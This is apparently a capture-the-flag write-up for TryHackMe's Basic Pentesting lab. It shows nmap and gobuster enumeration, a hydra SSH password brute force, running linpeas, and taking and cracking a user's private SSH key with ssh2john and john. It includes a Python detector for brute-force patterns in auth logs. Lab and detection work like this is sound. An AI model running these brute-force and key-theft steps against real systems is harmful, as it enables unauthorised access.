Basic Pentesting

This is a machine that allows you to practice web app hacking and privilege escalation

Try this challenge in TryHackMe: Basic Pentesting

In doing this challenge, I learned the following skills and tools:

  • brute forcing - using hydra

  • hash cracking - using ssh2john, john

  • service enumeration - using nmap, gobuster

  • Linux enumeration - using enum4linux, linpeas

Web App Testing and Privilege Escalation

Find the services exposed by the machine

Run nmap and save the output in a basicpentest directory:

mkdir basicpentest
nmap -sC -sV 10.10.X.X -oN basicpentest/initial

Just change the 10.10.X.X to the IP address assigned to your target machine

Check it in the browser: http://10.10.X.X

Try View Page Source. There is a note in green telling you to check their dev note section.

So let's check if there is a /dev directory.

We get Not Found responses from both paths, but the responses contain an information disclosure that is worth noting: the server banner reveals the exact Apache version and OS.

Apache/2.4.18 (Ubuntu) Server at 10.10.X.X Port 80

What is the name of the hidden directory on the web server (enter name without /)?

Using gobuster, let's find out which directories exist on the server.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.X.X

Even without finishing the scan, we get the directory /development.

When we access the directory, we'll see two text files, dev.txt and j.txt. Let's open both.

User brute-forcing to find the username & password

We found the users jan and kay via enum4linux:

/usr/bin/enum4linux -a 10.10.X.X | tee enum4linux.lo

Using hydra against the SSH service, we obtain jan's password:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X

Now that we know jan’s credentials, we use them to log in via SSH.
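The hydra run above leaves a very recognisable trail in the target's sshd log: a burst of failed password attempts from one source, followed by an accepted login from the same source. As an added defender-side example (not part of the original writeup), this Python script parses constructed auth.log lines and raises an alert when one source crosses a failure threshold, and again when a later login from that source succeeds. The hostname, IP addresses and log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/auth.log lines (not taken from the target machine).
SAMPLE_AUTH_LOG = """\
Oct 12 10:00:01 target sshd[1201]: Failed password for jan from 10.10.14.5 port 50122 ssh2
Oct 12 10:00:01 target sshd[1203]: Failed password for jan from 10.10.14.5 port 50124 ssh2
Oct 12 10:00:02 target sshd[1205]: Failed password for jan from 10.10.14.5 port 50126 ssh2
Oct 12 10:00:02 target sshd[1207]: Failed password for jan from 10.10.14.5 port 50128 ssh2
Oct 12 10:00:03 target sshd[1209]: Failed password for invalid user admin from 10.10.14.5 port 50130 ssh2
Oct 12 10:00:03 target sshd[1211]: Failed password for jan from 10.10.14.5 port 50132 ssh2
Oct 12 10:00:04 target sshd[1213]: Accepted password for jan from 10.10.14.5 port 50134 ssh2
Oct 12 10:03:00 target sshd[1300]: Failed password for kay from 192.168.1.20 port 41000 ssh2
Oct 12 10:03:30 target sshd[1302]: Accepted password for kay from 192.168.1.20 port 41002 ssh2
"""

# Matches both "Failed password for jan from ..." and "Failed password for invalid user admin from ..."
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def analyse(log_text, threshold=5):
    """Return alert strings for sources that look like a password-guessing attack."""
    failures = defaultdict(int)   # source IP -> number of failed logins seen
    targeted = defaultdict(set)   # source IP -> usernames that were tried
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # not an sshd login result line
        src, user, result = m["src"], m["user"], m["result"]
        if result == "Failed":
            failures[src] += 1
            targeted[src].add(user)
            if failures[src] == threshold:  # alert once, when the threshold is first crossed
                alerts.append(f"brute-force: {src} has {threshold} failed logins "
                              f"(users: {sorted(targeted[src])})")
        elif failures[src] >= threshold:
            # A success after a burst of failures is the signature of a guessed password.
            alerts.append(f"likely compromise: {src} succeeded as {user} via {m['method']} "
                          f"after {failures[src]} failures")
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_AUTH_LOG):
        print(alert)
```

The single failure from 192.168.1.20 stays below the threshold, so only the hydra-style source produces alerts; on a real host the same logic is what fail2ban-style tooling automates.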

Check the folders and see if we can find any interesting files.

Since most actions resulted in permission denied, we ran linpeas on the machine to check for possible privilege escalation methods.

To copy linpeas.sh to the machine into a writable directory (/dev/shm, or /tmp as in the command below):

scp linpeas.sh jan@10.10.X.X:/tmp

Check that the linpeas file was transferred successfully.

Make linpeas executable:

chmod +x linpeas.sh

Then execute linpeas:

./linpeas.sh

From the linpeas results, we found a readable private SSH key at /home/kay/.ssh/id_rsa.

Open the id_rsa file and copy its contents:

cat id_rsa

On your Kali machine, paste the contents into a file named kay_id_rsa:

nano kay_id_rsa

Change the permissions of the file so it is readable and writable only by you (ssh refuses keys with looser permissions):

chmod 600 kay_id_rsa

Try logging in to the machine as user kay using the id_rsa key:

ssh -i kay_id_rsa kay@10.10.X.X

We find that the key is encrypted and a passphrase is needed.

To recover the passphrase for kay’s id_rsa, we used ssh2john from the John the Ripper suite:

ssh2john ~/kay_id_rsa

Save the output to a text file so that john can crack it:

ssh2john ~/kay_id_rsa > ~/kay_id_rsa_john.txt

Using john on that file, we cracked the key and obtained the passphrase.

We can now log in as kay using the key and the recovered passphrase:

ssh -i kay_id_rsa kay@10.10.X.X

We opened the pass.bak file, which reveals the password.
